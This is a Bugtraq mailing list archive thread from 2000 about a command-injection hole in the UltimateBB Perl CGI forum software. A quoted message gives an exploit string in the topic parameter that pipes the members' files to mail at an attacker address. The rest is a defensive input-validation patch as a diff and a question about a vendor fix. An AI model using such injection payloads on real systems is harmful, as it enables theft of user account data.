Bugtraq mailing list archives
Re: perl-cgi hole in UltimateBB by Infopop Corp.
From: ILazar () TBG COM (Irwin Lazar)
Date: Thu, 17 Feb 2000 07:24:30 -0700
according to the folks at UBB, the latest version 5.43d, fixes this vulnerability. Has anyone been able to verify if this is in fact correct? Irwin
-----Original Message----- From: Jordan Ritter [mailto:jpr5 () BOS BINDVIEW COM] Sent: Tuesday, February 15, 2000 8:48 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp. On Mon, 14 Feb 2000, Kevin Hillabolt wrote: # It works on the full version also... # # Little different syntax: # topic=012345.cgi|cat%20../Members/*|mail hacker () evil org| # (note the ../ on the Members. You have to go up a directory to get the # file. Maybe you could stop it via simple folder permissions??) Provided with no warranty. unescape() borrowed from the far superior CGI.pm. It appears to work, but I haven't checked it for completeness. The ubb scripts are a programming disaster, and pass around metachars and filenames through form parameters, making input validation difficult. The patch below selectively validates input based on the name of the variable we're validating (i.e. only certain variables are dangerous; others are just dumb and not a risk). It's better to try and validate at the top leven then code review the source and try to patch every idiotic mistake that was made. At the very least, this stops the specific attack that was posted. There could be other holes that this doesn't cover, or alternative ways to carry out the same attack. Hopefully Infopop will get their act together soon. I can't believe they distribute this crap as commercial software. Actually, what I can't believe is how many people paid for it. God help us all. --jordan $ diff ubb_library.pl ubb_library.pl.orig 84,93d83 < # unescape URL-encoded data < sub unescape { < shift() if ref($_[0]); < my $todecode = shift; < return undef unless defined($todecode); < $todecode =~ tr/+/ /; # pluses become spaces < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; < return $todecode; < } < 1047a10381112,1120d1102 < # clean input < if ($key =~ /^(forum|topic|number|replynum)$/i) { < my($newval) = &unescape($val); < < if ($newval !~ /^([ -\@\w.]+)$/) { < $val = "bad_input"; < } < } < 1266,1284d1247 < < my(@out); < foreach $row (@in) { < my($name,$value) = split ("=", $row); < < if ($name =~ /^(forum|topic|number|replynum)$/i) { < my($newvalue) = &unescape($value); < < if ($newvalue !~ /^([ -\@\w.]+)$/) { < $value = "bad_input"; < } < < push @out, "$name=$value"; < } else { < push @out, $row; < } < } < @in = @out;
<HR NOSHADE> <UL> <LI>application/octet-stream attachment: Irwin_Lazar__E-mail_.vcf </UL>
Current thread:
- Re: perl-cgi hole in UltimateBB by Infopop Corp., (continued)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Dennis Taylor (Feb 18)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Kevin Hillabolt (Feb 14)
- AIX SNMP Defaults harikiri (Feb 15)
- Re: AIX SNMP Defaults Michal Zalewski (Feb 17)
- Re: AIX SNMP Defaults Troy Bollinger (Feb 21)
- riched32.dll buffer overflow Pauli Ojanpera (Feb 21)
- Re: AIX SNMP Defaults Troy Bollinger (Feb 17)
- Security Bulletins Digest Aleph One (Feb 17)
- AIX SNMP Defaults harikiri (Feb 15)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Jordan Ritter (Feb 15)
- Packet filter logging: MAC & TCP flags Jens Hektor (Feb 15)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Irwin Lazar (Feb 17)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Randal L. Schwartz (Feb 17)